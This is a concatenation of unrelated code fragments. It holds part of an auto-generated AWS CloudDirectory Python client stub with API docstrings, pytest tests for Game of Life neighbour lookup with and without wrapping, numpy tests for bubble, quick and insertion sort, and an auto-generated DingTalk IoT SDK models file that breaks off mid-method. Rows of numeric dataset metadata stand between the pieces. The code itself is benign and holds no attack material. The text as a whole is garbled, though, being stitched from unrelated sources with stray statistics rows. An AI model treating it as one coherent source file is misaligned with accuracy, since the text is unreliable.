:param AttributeUpdates: [REQUIRED]\nAttributes update structure.\n\n(dict) --A typed link facet attribute update.\n\nAttribute (dict) -- [REQUIRED]The attribute to update.\n\nName (string) -- [REQUIRED]The unique name of the typed link attribute.\n\nType (string) -- [REQUIRED]The type of the attribute.\n\nDefaultValue (dict) --The default value of the attribute (if configured).\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\nIsImmutable (boolean) --Whether the attribute is mutable or not.\n\nRules (dict) --Validation rules that are attached to the attribute definition.\n\n(string) --\n(dict) --Contains an Amazon Resource Name (ARN) and parameters that are associated with the rule.\n\nType (string) --The type of attribute validation rule.\n\nParameters (dict) --The minimum and maximum parameters that are associated with the rule.\n\n(string) --\n(string) --\n\n\n\n\n\n\n\n\n\n\nRequiredBehavior (string) -- [REQUIRED]The required behavior of the TypedLinkAttributeDefinition .\n\n\n\nAction (string) -- [REQUIRED]The action to perform when updating the attribute.\n\n\n\n\n
:type IdentityAttributeOrder: list
:param IdentityAttributeOrder: [REQUIRED]\nThe order of identity attributes for the facet, from most significant to least significant. The ability to filter typed links considers the order that the attributes are defined on the typed link facet. When providing ranges to a typed link selection, any inexact ranges must be specified at the end. Any attributes that do not have a range specified are presumed to match the entire range. Filters are interpreted in the order of the attributes on the typed link facet, not the order in which they are supplied to any API calls. For more information about identity attributes, see Typed Links .\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.FacetValidationException
CloudDirectory.Client.exceptions.InvalidFacetUpdateException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetNotFoundException
CloudDirectory.Client.exceptions.InvalidRuleException
:return: {}
:returns:
(dict) --
"""
pass
def upgrade_applied_schema(PublishedSchemaArn=None, DirectoryArn=None, DryRun=None):
"""
Upgrades a single directory in-place using the PublishedSchemaArn with schema updates found in MinorVersion . Backwards-compatible minor version upgrades are instantaneously available for readers on all objects in the directory. Note: This is a synchronous API call and upgrades only one schema on a given directory per call. To upgrade multiple directories from one schema, you would need to call this API on each directory.
See also: AWS API Documentation
Exceptions
:example: response = client.upgrade_applied_schema(
PublishedSchemaArn='string',
DirectoryArn='string',
DryRun=True|False
)
:type PublishedSchemaArn: string
:param PublishedSchemaArn: [REQUIRED]\nThe revision of the published schema to upgrade the directory to.\n
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe ARN for the directory to which the upgraded schema will be applied.\n
:type DryRun: boolean
:param DryRun: Used for testing whether the major version schemas are backward compatible or not. If schema compatibility fails, an exception would be thrown else the call would succeed but no changes will be saved. This parameter is optional.
:rtype: dict
ReturnsResponse Syntax
{
'UpgradedSchemaArn': 'string',
'DirectoryArn': 'string'
}
Response Structure
(dict) --
UpgradedSchemaArn (string) --
The ARN of the upgraded schema that is returned as part of the response.
DirectoryArn (string) --
The ARN of the directory that is returned as part of the response.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.IncompatibleSchemaException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidAttachmentException
CloudDirectory.Client.exceptions.SchemaAlreadyExistsException
:return: {
'UpgradedSchemaArn': 'string',
'DirectoryArn': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.IncompatibleSchemaException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidAttachmentException
CloudDirectory.Client.exceptions.SchemaAlreadyExistsException
"""
pass
def upgrade_published_schema(DevelopmentSchemaArn=None, PublishedSchemaArn=None, MinorVersion=None, DryRun=None):
"""
Upgrades a published schema under a new minor version revision using the current contents of DevelopmentSchemaArn .
See also: AWS API Documentation
Exceptions
:example: response = client.upgrade_published_schema(
DevelopmentSchemaArn='string',
PublishedSchemaArn='string',
MinorVersion='string',
DryRun=True|False
)
:type DevelopmentSchemaArn: string
:param DevelopmentSchemaArn: [REQUIRED]\nThe ARN of the development schema with the changes used for the upgrade.\n
:type PublishedSchemaArn: string
:param PublishedSchemaArn: [REQUIRED]\nThe ARN of the published schema to be upgraded.\n
:type MinorVersion: string
:param MinorVersion: [REQUIRED]\nIdentifies the minor version of the published schema that will be created. This parameter is NOT optional.\n
:type DryRun: boolean
:param DryRun: Used for testing whether the Development schema provided is backwards compatible, or not, with the publish schema provided by the user to be upgraded. If schema compatibility fails, an exception would be thrown else the call would succeed. This parameter is optional and defaults to false.
:rtype: dict
ReturnsResponse Syntax
{
'UpgradedSchemaArn': 'string'
}
Response Structure
(dict) --
UpgradedSchemaArn (string) --
The ARN of the upgraded schema that is returned as part of the response.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.IncompatibleSchemaException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidAttachmentException
CloudDirectory.Client.exceptions.LimitExceededException
:return: {
'UpgradedSchemaArn': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.IncompatibleSchemaException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidAttachmentException
CloudDirectory.Client.exceptions.LimitExceededException
"""
pass
| 42.739367
| 31,246
| 0.668804
| 39,622
| 361,746
| 6.096335
| 0.023093
| 0.066488
| 0.099731
| 0.004686
| 0.93439
| 0.924367
| 0.912171
| 0.895996
| 0.887985
| 0.879225
| 0
| 0.00381
| 0.25477
| 361,746
| 8,463
| 31,247
| 42.744417
| 0.892197
| 0.970427
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.5
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
5b828d9be61d9ffde99e3287c80a06730df0311d
| 234
|
py
|
Python
|
BOReL/environments/mujoco/rand_param_envs/gym/envs/parameter_tuning/__init__.py
|
hai-h-nguyen/pomdp-baselines
|
629180d56641810d99653a116cca41ede65172eb
|
[
"MIT"
] | 40
|
2021-10-15T14:53:00.000Z
|
2022-03-31T02:27:20.000Z
|
BOReL/environments/mujoco/rand_param_envs/gym/envs/parameter_tuning/__init__.py
|
hai-h-nguyen/pomdp-baselines
|
629180d56641810d99653a116cca41ede65172eb
|
[
"MIT"
] | 1
|
2022-03-13T04:02:30.000Z
|
2022-03-13T04:02:30.000Z
|
BOReL/environments/mujoco/rand_param_envs/gym/envs/parameter_tuning/__init__.py
|
hai-h-nguyen/pomdp-baselines
|
629180d56641810d99653a116cca41ede65172eb
|
[
"MIT"
] | 5
|
2021-11-28T04:08:13.000Z
|
2022-03-17T02:33:51.000Z
|
from environments.mujoco.rand_param_envs.gym.envs.parameter_tuning.convergence import (
ConvergenceControl,
)
from environments.mujoco.rand_param_envs.gym.envs.parameter_tuning.train_deep_cnn import (
CNNClassifierTraining,
)
| 33.428571
| 90
| 0.837607
| 28
| 234
| 6.714286
| 0.571429
| 0.170213
| 0.234043
| 0.276596
| 0.606383
| 0.606383
| 0.606383
| 0.606383
| 0.606383
| 0.606383
| 0
| 0
| 0.08547
| 234
| 6
| 91
| 39
| 0.878505
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
5bce4c8d17cf5825c4882b9958da62664551b8df
| 9,600
|
py
|
Python
|
life/test_sparse_set_state.py
|
freesurfer-rge/simple-life
|
aab5d11dabb05036bb88569130ebf7493d7d843a
|
[
"MIT"
] | null | null | null |
life/test_sparse_set_state.py
|
freesurfer-rge/simple-life
|
aab5d11dabb05036bb88569130ebf7493d7d843a
|
[
"MIT"
] | null | null | null |
life/test_sparse_set_state.py
|
freesurfer-rge/simple-life
|
aab5d11dabb05036bb88569130ebf7493d7d843a
|
[
"MIT"
] | null | null | null |
import pytest
from typing import List, Set, Tuple
from .sparse_set_state import SparseSetState
class TestGetNeighboursNoWrap:
def check_neighbours(
self, actual: List[Tuple[int, int]], expected: Set[Tuple[int, int]]
):
assert isinstance(actual, list)
# Compare sets, since the neighbour order shouldn't matter
assert set(actual) == expected
@pytest.mark.parametrize(
"cell,expected",
[
((0, 0), {(0, 1), (1, 1), (1, 0)}),
((2, 2), {(1, 2), (1, 1), (2, 1)}),
((0, 2), {(1, 2), (1, 1), (0, 1)}),
((2, 0), {(2, 1), (1, 1), (1, 0)}),
],
ids=["(0,0)", "(2,2)", "(0,2)", "(2,0)"],
)
def test_get_neighbours_corner(self, cell, expected):
# Don't need any active cells
target = SparseSetState({})
actual = target.get_neighbours(cell, 3, 3)
self.check_neighbours(actual, expected)
@pytest.mark.parametrize(
"cell, expected",
[
((1, 0), {(0, 0), (0, 1), (1, 1), (2, 1), (2, 0)}),
((0, 1), {(0, 0), (1, 0), (1, 1), (1, 2), (0, 2)}),
((1, 2), {(0, 2), (0, 1), (1, 1), (2, 1), (2, 2)}),
((2, 1), {(2, 0), (1, 0), (1, 1), (1, 2), (2, 2)}),
],
ids=["(1,0)", "(0,1)", "(1,2)", "(2,1)"],
)
def test_get_neighbours_edge(self, cell, expected):
# Don't need any active cells
target = SparseSetState({})
actual = target.get_neighbours(cell, 3, 3)
self.check_neighbours(actual, expected)
def test_get_neighbours_centre(self):
# Don't need any active cells
target = SparseSetState({})
actual = target.get_neighbours((1, 1), 3, 3)
expected = {
(0, 0),
(0, 1),
(0, 2),
(1, 0),
(1, 2),
(2, 0),
(2, 1),
(2, 2),
}
self.check_neighbours(actual, expected)
class TestGetNeighboursWrap3x3:
def check_neighbours(
self, actual: List[Tuple[int, int]], expected: Set[Tuple[int, int]]
):
assert isinstance(actual, list)
# Compare sets, since the neighbour order shouldn't matter
assert set(actual) == expected
@pytest.mark.parametrize(
"cell",
[(0, 0), (2, 2), (0, 2), (2, 0)],
ids=["(0,0)", "(2,2)", "(0,2)", "(2,0)"],
)
def test_get_neighbours_corner(self, cell):
nx = 3
ny = 3
# Don't need any active cells
target = SparseSetState({})
# With wrapping everything should neighbour everything on a 3x3
expected: Set[Tuple[int, int]] = set()
for i in range(nx):
for j in range(ny):
expected.add((i, j))
expected.discard(cell)
actual = target.get_neighbours(cell, nx, ny, x_wrap=True, y_wrap=True)
self.check_neighbours(actual, expected)
@pytest.mark.parametrize(
"cell",
[(0, 1), (1, 0), (2, 1), (1, 2)],
ids=["(0,1)", "(1,0)", "(2,1)", "(1,2)"],
)
def test_get_neighbours_edge(self, cell):
nx = 3
ny = 3
# Don't need any active cells
target = SparseSetState({})
# With wrapping everything should neighbour everything on a 3x3
expected: Set[Tuple[int, int]] = set()
for i in range(nx):
for j in range(ny):
expected.add((i, j))
expected.discard(cell)
actual = target.get_neighbours(cell, nx, ny, x_wrap=True, y_wrap=True)
self.check_neighbours(actual, expected)
def test_get_neighbours_centre(self):
# Don't need any active cells
target = SparseSetState({})
actual = target.get_neighbours((1, 1), 3, 3, x_wrap=True, y_wrap=True)
expected = {
(0, 0),
(0, 1),
(0, 2),
(1, 0),
(1, 2),
(2, 0),
(2, 1),
(2, 2),
}
self.check_neighbours(actual, expected)
class TestGetNeighboursWrap5x5:
def fetch_neighbours(self, target_cell: Tuple[int, int]):
target = SparseSetState({})
neighbours = target.get_neighbours(
target_cell, 5, 5, x_wrap=True, y_wrap=True
)
return neighbours
def check_neighbours(
self, actual: List[Tuple[int, int]], expected: Set[Tuple[int, int]]
):
assert isinstance(actual, list)
assert len(expected) == 8 # With wrapping, always have 8 neighbours
assert len(actual) == 8
# Compare sets, since the neighbour order shouldn't matter
assert set(actual) == expected
def test_check_centre(self):
actual = self.fetch_neighbours(target_cell=(2, 2))
expected = {
(1, 1),
(2, 1),
(3, 1),
(1, 2),
(3, 2),
(1, 3),
(2, 3),
(3, 3),
}
self.check_neighbours(actual, expected)
@pytest.mark.parametrize(
"cell,expected",
[
(
(2, 1),
{
(1, 0),
(2, 0),
(3, 0),
(1, 1),
(3, 1),
(1, 2),
(2, 2),
(3, 2),
},
),
(
(1, 2),
{
(0, 1),
(0, 2),
(0, 3),
(1, 1),
(1, 3),
(2, 1),
(2, 2),
(2, 3),
},
),
(
(2, 3),
{
(1, 2),
(2, 2),
(3, 2),
(1, 3),
(3, 3),
(1, 4),
(2, 4),
(3, 4),
},
),
(
(3, 2),
{
(2, 1),
(2, 2),
(2, 3),
(3, 1),
(3, 3),
(4, 1),
(4, 2),
(4, 3),
},
),
],
ids=["(2,1)", "(1,2)", "(2,3)", "(3,2)"],
)
def test_touch_edge(self, cell, expected):
actual = self.fetch_neighbours(cell)
self.check_neighbours(actual, expected)
@pytest.mark.parametrize(
"cell,expected",
[
(
(2, 0),
{
(1, 4),
(2, 4),
(3, 4),
(1, 0),
(3, 0),
(1, 1),
(2, 1),
(3, 1),
},
),
(
(0, 2),
{
(4, 1),
(4, 2),
(4, 3),
(0, 1),
(0, 3),
(1, 1),
(1, 2),
(1, 3),
},
),
(
(2, 4),
{
(1, 3),
(2, 3),
(3, 3),
(1, 4),
(3, 4),
(1, 0),
(2, 0),
(3, 0),
},
),
(
(4, 2),
{
(3, 1),
(3, 2),
(3, 3),
(4, 1),
(4, 3),
(0, 1),
(0, 2),
(0, 3),
},
),
],
ids=["(2,0)", "(0,2)", "(2,4)", "(4,2)"],
)
def test_overlap_edge(self, cell, expected):
actual = self.fetch_neighbours(cell)
self.check_neighbours(actual, expected)
@pytest.mark.parametrize(
"cell,expected",
[
(
(0, 0),
{
(4, 4),
(0, 4),
(1, 4),
(4, 0),
(1, 0),
(4, 1),
(0, 1),
(1, 1),
},
),
(
(0, 4),
{
(4, 3),
(0, 3),
(1, 3),
(4, 4),
(1, 4),
(4, 0),
(0, 0),
(1, 0),
},
),
(
(4, 0),
{
(3, 4),
(4, 4),
(0, 4),
(3, 0),
(0, 0),
(3, 1),
(4, 1),
(0, 1),
},
),
(
(4, 4),
{
(3, 3),
(4, 3),
(0, 3),
(3, 4),
(0, 4),
(3, 0),
(4, 0),
(0, 0),
},
),
],
ids=["(0,0)", "(0,4)", "(4,0)", "(4,4)"],
)
def test_overlap_corner(self, cell, expected):
actual = self.fetch_neighbours(cell)
self.check_neighbours(actual, expected)
| 27.195467
| 78
| 0.328542
| 936
| 9,600
| 3.301282
| 0.086538
| 0.023301
| 0.013592
| 0.080906
| 0.818447
| 0.786731
| 0.741748
| 0.712621
| 0.705178
| 0.693204
| 0
| 0.096586
| 0.517917
| 9,600
| 352
| 79
| 27.272727
| 0.571089
| 0.052292
| 0
| 0.71246
| 0
| 0
| 0.023555
| 0
| 0
| 0
| 0
| 0
| 0.025559
| 1
| 0.044728
| false
| 0
| 0.009585
| 0
| 0.067093
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5bd0d8b704e199534360d6348b4da93478ee2035
| 3,162
|
py
|
Python
|
test/test_algs.py
|
jessicagainesbmi203/example
|
94aac309e2e8f217edd1d45ffde10b586db0a6a7
|
[
"Apache-2.0"
] | null | null | null |
test/test_algs.py
|
jessicagainesbmi203/example
|
94aac309e2e8f217edd1d45ffde10b586db0a6a7
|
[
"Apache-2.0"
] | null | null | null |
test/test_algs.py
|
jessicagainesbmi203/example
|
94aac309e2e8f217edd1d45ffde10b586db0a6a7
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from example import algs
def test_pointless_sort():
# generate random vector of length 10
x = np.random.rand(10)
# check that pointless_sort always returns [1,2,3]
assert np.array_equal(algs.pointless_sort(x), np.array([1,2,3]))
# generate a new random vector of length 10
x = np.random.rand(10)
# check that pointless_sort still returns [1,2,3]
assert np.array_equal(algs.pointless_sort(x), np.array([1,2,3]))
def test_bubblesort():
# Actually test bubblesort here. It might be useful to think about
# some edge cases for your code, where it might fail. Some things to
# think about: (1) does your code handle 0-element arrays without
# failing, (2) does your code handle characters?
# test odd length
x = np.array([1,2,4,0,1])
assert np.array_equal(algs.bubblesort(x)['sorted'],np.array([0,1,1,2,4]))
# test even length
x = np.array([1,2,4,0])
assert np.array_equal(algs.bubblesort(x)['sorted'], np.array([0,1,2,4]))
# test empty vector
x = np.array([])
assert np.array_equal(algs.bubblesort(x)['sorted'],np.array([]))
# test single element vector
x = np.array([7])
assert np.array_equal(algs.bubblesort(x)['sorted'],np.array([7]))
# test duplicated elements
x = np.array([1,1,1,1])
assert np.array_equal(algs.bubblesort(x)['sorted'],np.array([1,1,1,1]))
# test characters
x = np.array(['b','d','a','c'])
assert np.array_equal(algs.bubblesort(x)['sorted'],np.array(['a','b','c','d']))
def test_quicksort():
# test odd length
x = np.array([1,2,4,0,3])
assert np.array_equal(algs.quicksort(x)['sorted'],np.array([0,1,2,3,4]))
# test even length
x = np.array([1,2,4,0])
assert np.array_equal(algs.quicksort(x)['sorted'], np.array([0,1,2,4]))
# test empty vector
x = np.array([])
assert np.array_equal(algs.quicksort(x)['sorted'],np.array([]))
# test single element vector
x = np.array([7])
assert np.array_equal(algs.quicksort(x)['sorted'],np.array([7]))
# test duplicated elements
x = np.array([1,1,1,1])
#assert np.array_equal(algs.quicksort(x)['sorted'],np.array([1,1,1,1]))
# test characters
x = np.array(['b','d','a','c'])
assert np.array_equal(algs.quicksort(x)['sorted'],np.array(['a','b','c','d']))
def test_insertionsort():
# test odd length
x = np.array([1,2,4,0,3])
assert np.array_equal(algs.insertionsort(x)['sorted'],np.array([0,1,2,3,4]))
# test even length
x = np.array([1,2,4,0])
assert np.array_equal(algs.insertionsort(x)['sorted'], np.array([0,1,2,4]))
# test empty vector
x = np.array([])
assert np.array_equal(algs.insertionsort(x)['sorted'],np.array([]))
# test single element vector
x = np.array([7])
assert np.array_equal(algs.insertionsort(x)['sorted'],np.array([7]))
# test duplicated elements
x = np.array([1,1,1,1])
assert np.array_equal(algs.insertionsort(x)['sorted'],np.array([1,1,1,1]))
# test characters
x = np.array(['b','d','a','c'])
assert np.array_equal(algs.insertionsort(x)['sorted'],np.array(['a','b','c','d']))
| 39.525
| 90
| 0.627767
| 527
| 3,162
| 3.711575
| 0.13852
| 0.207566
| 0.132924
| 0.184049
| 0.836912
| 0.836912
| 0.836912
| 0.836912
| 0.834867
| 0.834867
| 0
| 0.041106
| 0.176787
| 3,162
| 80
| 90
| 39.525
| 0.710334
| 0.26692
| 0
| 0.466667
| 1
| 0
| 0.054998
| 0
| 0
| 0
| 0
| 0
| 0.422222
| 1
| 0.088889
| false
| 0
| 0.044444
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
7506ac14fbe9c06879aae568a17039aa31289a72
| 108
|
py
|
Python
|
nn4mc/__init__.py
|
RS-Coop/Correll_Lab
|
7c9ea0ff0ce3f54848a0eb112ef29b28d8e735e5
|
[
"MIT"
] | 4
|
2021-05-31T23:49:39.000Z
|
2022-03-16T12:27:08.000Z
|
nn4mc/__init__.py
|
RS-Coop/Correll_Lab
|
7c9ea0ff0ce3f54848a0eb112ef29b28d8e735e5
|
[
"MIT"
] | 1
|
2021-10-02T19:51:01.000Z
|
2022-01-20T21:45:37.000Z
|
nn4mc/__init__.py
|
correlllab/nn4mc_py
|
24fa3f9187f7d89692041b640c48f91c2a77b644
|
[
"MIT"
] | null | null | null |
from .analysis import * #Should be available to user
from .translator import * #Should be available to user
| 36
| 54
| 0.777778
| 16
| 108
| 5.25
| 0.5625
| 0.285714
| 0.333333
| 0.547619
| 0.690476
| 0.690476
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 108
| 2
| 55
| 54
| 0.933333
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7536ee82020868636edd7b1cf06d76ef865dc693
| 43,012
|
py
|
Python
|
dingtalk/python/alibabacloud_dingtalk/diot_1_0/models.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 15
|
2020-08-27T04:10:26.000Z
|
2022-03-07T06:25:42.000Z
|
dingtalk/python/alibabacloud_dingtalk/diot_1_0/models.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 1
|
2020-09-27T01:30:46.000Z
|
2021-12-29T09:15:34.000Z
|
dingtalk/python/alibabacloud_dingtalk/diot_1_0/models.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 5
|
2020-08-27T04:07:44.000Z
|
2021-12-03T02:55:20.000Z
|
# -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from Tea.model import TeaModel
from typing import Dict, List, Any
class BatchDeleteDeviceHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class BatchDeleteDeviceRequest(TeaModel):
def __init__(
self,
corp_id: str = None,
device_ids: List[str] = None,
):
# 钉钉物联组织ID, 第三方平台必填,企业内部系统忽略。
self.corp_id = corp_id
# 设备ID列表,最多500条。
self.device_ids = device_ids
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.corp_id is not None:
result['corpId'] = self.corp_id
if self.device_ids is not None:
result['deviceIds'] = self.device_ids
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('corpId') is not None:
self.corp_id = m.get('corpId')
if m.get('deviceIds') is not None:
self.device_ids = m.get('deviceIds')
return self
class BatchDeleteDeviceResponseBody(TeaModel):
def __init__(
self,
device_ids: List[str] = None,
):
# 成功删除设备ID列表。
self.device_ids = device_ids
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.device_ids is not None:
result['deviceIds'] = self.device_ids
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deviceIds') is not None:
self.device_ids = m.get('deviceIds')
return self
class BatchDeleteDeviceResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: BatchDeleteDeviceResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = BatchDeleteDeviceResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class PushEventHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class PushEventRequest(TeaModel):
def __init__(
self,
corp_id: str = None,
event_id: str = None,
event_type: str = None,
event_name: str = None,
occurrence_time: int = None,
device_id: str = None,
location: str = None,
msg: str = None,
pic_urls: List[str] = None,
extra_data: Dict[str, Any] = None,
):
# 钉钉物联组织ID, 第三方平台必填,企业内部系统忽略。
self.corp_id = corp_id
# 事件ID。
self.event_id = event_id
# 事件类型,最长20个字符。
self.event_type = event_type
# 事件名称,长度4-20个字符,一个中文汉字算2个字符。
self.event_name = event_name
# 事件发生事件,Unix时间戳,单位毫秒。
self.occurrence_time = occurrence_time
# 触发事件设备ID。
self.device_id = device_id
# 事件发生地点。
self.location = location
# 事件文字信息。
self.msg = msg
# 事件图片地址列表。
self.pic_urls = pic_urls
# 第三方平台定制参数,企业内部系统忽略。
self.extra_data = extra_data
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.corp_id is not None:
result['corpId'] = self.corp_id
if self.event_id is not None:
result['eventId'] = self.event_id
if self.event_type is not None:
result['eventType'] = self.event_type
if self.event_name is not None:
result['eventName'] = self.event_name
if self.occurrence_time is not None:
result['occurrenceTime'] = self.occurrence_time
if self.device_id is not None:
result['deviceId'] = self.device_id
if self.location is not None:
result['location'] = self.location
if self.msg is not None:
result['msg'] = self.msg
if self.pic_urls is not None:
result['picUrls'] = self.pic_urls
if self.extra_data is not None:
result['extraData'] = self.extra_data
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('corpId') is not None:
self.corp_id = m.get('corpId')
if m.get('eventId') is not None:
self.event_id = m.get('eventId')
if m.get('eventType') is not None:
self.event_type = m.get('eventType')
if m.get('eventName') is not None:
self.event_name = m.get('eventName')
if m.get('occurrenceTime') is not None:
self.occurrence_time = m.get('occurrenceTime')
if m.get('deviceId') is not None:
self.device_id = m.get('deviceId')
if m.get('location') is not None:
self.location = m.get('location')
if m.get('msg') is not None:
self.msg = m.get('msg')
if m.get('picUrls') is not None:
self.pic_urls = m.get('picUrls')
if m.get('extraData') is not None:
self.extra_data = m.get('extraData')
return self
class PushEventResponseBody(TeaModel):
def __init__(
self,
event_id: str = None,
):
# 事件ID。
self.event_id = event_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.event_id is not None:
result['eventId'] = self.event_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('eventId') is not None:
self.event_id = m.get('eventId')
return self
class PushEventResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: PushEventResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = PushEventResponseBody()
